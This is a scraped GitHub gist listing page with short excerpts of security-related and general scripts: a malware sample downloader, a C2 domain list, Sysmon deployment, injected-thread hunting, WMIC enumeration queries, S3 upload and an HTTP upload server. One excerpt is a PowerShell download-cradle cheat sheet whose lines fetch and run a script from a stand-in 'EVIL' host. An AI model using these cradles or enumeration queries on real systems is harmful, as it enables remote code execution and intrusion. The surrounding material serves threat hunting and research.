Hestat
peasead
/ malware-bazaar-tag-download.sh
Created
June 15, 2021 19:04
Download samples from Malware Bazaar based on tag.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Bash script to download Malware Bazaar based on tag | |
| # Define tag and number of samples to download | |
| TAG=insert-malware-bazaar-tag | |
| DOWNLOAD_LIMIT=100 | |
| # Determin OS | |
| OS=$(uname -s) | |
| # Download hash values from tag, save the SHA256 hashes |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # C2 FQDNs | |
| first seen fqdn | |
| 2019-12-11 23:37:10 updatemanagir.us | |
| 2019-12-20 17:51:05 cmdupdatewin.com | |
| 2019-12-26 18:03:27 scrservallinst.info | |
| 2020-01-10 00:33:57 winsystemupdate.com | |
| 2020-01-11 23:16:41 jomamba.best | |
| 2020-01-13 05:13:43 updatewinlsass.com | |
| 2020-01-16 11:38:53 winsysteminfo.com | |
| 2020-01-20 05:58:17 livecheckpointsrs.com |
silentbreaksec
/ SysmonStartup.bat
Created
March 2, 2018 23:39
Windows batch file to deploy Sysmon using a startup script via GPO
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| :: Author: Ryan Watson | |
| :: Twitter: @gentlemanwatson | |
| :: Version: 1.0 | |
| :: Credits: Credit to Syspanda.com and their Sysmon GPO article for the kick off point | |
| :: https://www.syspanda.com/index.php/2017/02/28/deploying-sysmon-through-gpo/ | |
| :: ** IMPORTANT ** | |
| :: 1) Create a Sysmon folder with the SYSVOL share on your domain controller | |
| :: 2) Download Sysmon from Microsoft and place both sysmon.exe and sysmon64.exe in |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import zipfile | |
| import io | |
| import sys | |
| import os, imp | |
| import base64 | |
| import threading | |
| moduleRepo = {} | |
| _meta_cache = {} |
jaredcatkinson
/ Get-InjectedThread.ps1
Last active
April 22, 2024 19:09
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
xorrior
/ wmic_cmds.txt
Last active
April 28, 2024 14:47
Useful Wmic queries for host and domain enumeration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host Enumeration: | |
| --- OS Specifics --- | |
| wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
| wmic computersystem LIST full | |
| --- Anti-Virus --- | |
| wmic /namespace:\\root\securitycenter2 path antivirusproduct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
chrismdp
/ s3.sh
Last active
March 5, 2024 12:57
Uploading to S3 in 18 lines of Shell (used to upload builds for http://soltrader.net)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine | |
| # This is how I upload my new Sol Trader builds (http://soltrader.net) | |
| # Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash | |
| S3KEY="my aws key" | |
| S3SECRET="my aws secret" # pass these in | |
| function putS3 | |
| { | |
| path=$1 |
UniIsland
/ SimpleHTTPServerWithUpload.py
Created
August 14, 2012 04:01
Simple Python Http Server with Upload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| """ |